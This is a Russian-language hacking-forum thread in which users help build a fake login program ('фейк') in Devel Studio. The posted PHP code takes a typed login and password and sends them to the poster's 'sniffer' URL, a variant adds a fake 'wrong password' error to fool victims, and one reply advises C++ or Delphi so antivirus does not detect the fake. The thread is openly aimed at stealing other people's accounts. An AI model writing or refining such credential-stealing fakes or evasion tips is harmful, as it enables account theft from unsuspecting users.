Загрузка...
Загрузка...

Devel Studio помощь!

Тема в разделе "HackTools", создана пользователем Mr.Showtek, 26.10.2011.

  1. Mr.Showtek

    Mr.Showtek

    Статус:
    Оффлайн
    Регистрация:
    25.10.2011
    Сообщения:
    158
    Репутация:
    63 +/-
    Воспользовался программой Devel Studio(не реклама), все создал, затем создал кнопку( в ней клик и отредактировал), написал вот что,

    $edit1 = c('Form1->edit1')->text;
    $edit2 = c('Form1->edit2')->text;
    $url = "Сюда ввел свой сниффер.";
    file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
    Нажал создать программу, сохрани, переименовал с .exe затем открываю и мне пишут не удалось открыть, возможно у вас недостаточно прав! Что делать? Заранее благодарен!
     
  2. ForYou

    ForYou

    Статус:
    Оффлайн
    Регистрация:
    11.06.2011
    Сообщения:
    2.515
    Репутация:
    1.427 +/-
    от имени админа запускай
     
  3. Mr.Showtek

    Mr.Showtek

    Статус:
    Оффлайн
    Регистрация:
    25.10.2011
    Сообщения:
    158
    Репутация:
    63 +/-
    Пробовал, все равно, щас скину ссылку(вирусов нет)

    Вот ссылка http://depositfiles.com/files/khepwbgcz
     
  4. JoKeR_AppLe

    JoKeR_AppLe

    Статус:
    Оффлайн
    Регистрация:
    30.09.2011
    Сообщения:
    460
    Репутация:
    206 +/-
    Mr.Showtek а чего у тебя такой ник?
     
  5. Mr.Showtek

    Mr.Showtek

    Статус:
    Оффлайн
    Регистрация:
    25.10.2011
    Сообщения:
    158
    Репутация:
    63 +/-
    Просто! :)
     
  6. Mishka36

    Mishka36

    Статус:
    Оффлайн
    Регистрация:
    23.06.2011
    Сообщения:
    420
    Репутация:
    138 +/-
    Mr.Showtek,
    забей на это дело, время лишь зря теряешь, фейки это уже старый и всем известный метод!
     
  7. Mr.Showtek

    Mr.Showtek

    Статус:
    Оффлайн
    Регистрация:
    25.10.2011
    Сообщения:
    158
    Репутация:
    63 +/-
    Смотря кого еще ломать!
     
  8. Synapsehome

    Synapsehome

    Статус:
    Оффлайн
    Регистрация:
    26.06.2010
    Сообщения:
    813
    Репутация:
    514 +/-
    Почему бы не использовать тот-же самый VB начиная с версии 6.0... Гораздо проще и намного быстрее.
     
  9. Figaro

    Figaro

    Статус:
    Оффлайн
    Регистрация:
    19.04.2012
    Сообщения:
    1
    Репутация:
    0 +/-
    $edit1 = c('Form1->edit1')->text;

    $edit2 = c('Form1->edit2')->text;

    $combobox1 = c('Form1->combobox1')->inText;

    $url = "снифер";

    MessageBox ("Невернно введёт логин или пароль", "ERROR");
     
  10. EzioAuditore

    EzioAuditore

    Статус:
    Оффлайн
    Регистрация:
    17.05.2012
    Сообщения:
    42
    Репутация:
    0 +/-
    Согласен. + фейки на Devel Studio быстро палятся антивирусами. Юзай C++ и Delphi на них фейки хоть и сложней но зато лучше получаются и не палятся антивирями
     
  11. Lees

    ꕔ ꕔ
    Lees

    Статус:
    Оффлайн
    Регистрация:
    08.11.2011
    Сообщения:
    55
    Репутация:
    1.633 +/-
    Что за дела? одни забаненые..